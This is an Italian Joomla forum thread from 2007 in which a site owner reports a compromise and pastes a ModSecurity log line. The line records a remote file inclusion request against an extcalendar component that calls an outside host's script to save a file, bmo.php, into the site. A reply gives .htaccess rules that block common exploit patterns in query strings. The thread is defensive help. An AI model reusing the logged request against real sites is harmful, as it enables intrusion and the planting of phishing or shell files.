Back to top

Autore Topic: PHP Injection Attack  (Letto 3381 volte)

Offline unsu82

  • Nuovo arrivato
  • *
  • Post: 4
    • Mostra profilo
PHP Injection Attack
« il: 10 Ott 2007, 17:28:04 »
Salve a Tutti,
ho realizzato quanche mese fa un sito con Joomla 1.0.11 e docmanV13-RC2.
Tutto OK fino a qualche giorno fa, fino a quando non è stato + possibile accedere al sito.
Allora ho contattato colui che fornisce il servizio di hosting e mi ha detti che c'è stato un "PHP Injection Attack".  :'(
Questo è quello che ha trovato in ModSecurity di Apache:

---

[Sun Oct 07 20:10:36 2007] [error] [client 193.93.98.197] ModSecurity:
Access
nied with code 501 (phase 2). Pattern match
"(?:(?:\\\\b(?:f(?:tp_(?:nb_)?f?(
e|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open
ad)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:pr
|bz)open)|\\\\$_(?:(?:pos|ge)t|session))\\\\b|<\\\\?(?!xml))" at
ARGS:S1. [id
50013"] [msg "PHP Injection Attack. Matched signature <<?>"] [severity
"CRITI
"] [hostname "www.xxx.it"] [uri
"/components/com_extcalend
admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://andravarldar.se/cmd?&action
=save&chdir=/home/xxx/components/com_docman/&file=bmo.p
hp"] [unique_id "DXl7NUUpok8AAF3IJu0AAAAG"]

----

Questa è la directory dove è stato caricato il phishing:

/home/xxx/components/com_docman/

Adesso però sono abbastanza preoccupato xkè mi ha detto che devo ripulire il sito, altrimenti lo rigetta.
Ho cercato con google ma non ho trovato niente, mi ha detto che devo risolvere il bug, ma non cosa fare se non altro che eliminare lo script di phishing inserito che è nominato bmo.php e bmo.html.

Grazie a chiunque sappia aiutarmi!  :'( :'( :'(

Offline Luca Curatola

  • Team Joomla.it
  • Abituale
  • *******
  • Post: 1086
  • Sesso: Maschio
    • Mostra profilo
Re: PHP Injection Attack
« Risposta #1 il: 10 Ott 2007, 18:15:11 »
Aggiorna la versione di joomla, aggiorna le versioni dei componenti installati, metti in sola lettura il file configuration.php e aggiungi nel file .htaccess nella root del sito (se non c'e' crealo) questo codice:

Codice: [Seleziona]
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

Sgaragnao il provider più ricercato su google! :)

Offline unsu82

  • Nuovo arrivato
  • *
  • Post: 4
    • Mostra profilo
Re: PHP Injection Attack
« Risposta #2 il: 10 Ott 2007, 23:17:35 »
Grazie Tantissime Provo Subito!

Offline gt_67

  • Esploratore
  • **
  • Post: 80
    • Mostra profilo
Re: PHP Injection Attack
« Risposta #3 il: 19 Ott 2007, 09:37:47 »
Grazie del suggerimento ! lo faccio anche io subito.

Mi sono accorto di avere un file htaccess.txt e non un file .htaccess ...pensavo di essere protetto ed invece ...

Grazie davvero di cuore !

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: PHP Injection Attack
« Risposta #4 il: 19 Ott 2007, 09:44:16 »
ciao neoviruz queste informazioni non sarebbe male raccoglierle nel joomwiki, in questo modo non si perderanno nei 129165 messaggi.
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

 



Web Design Bolzano Kreatif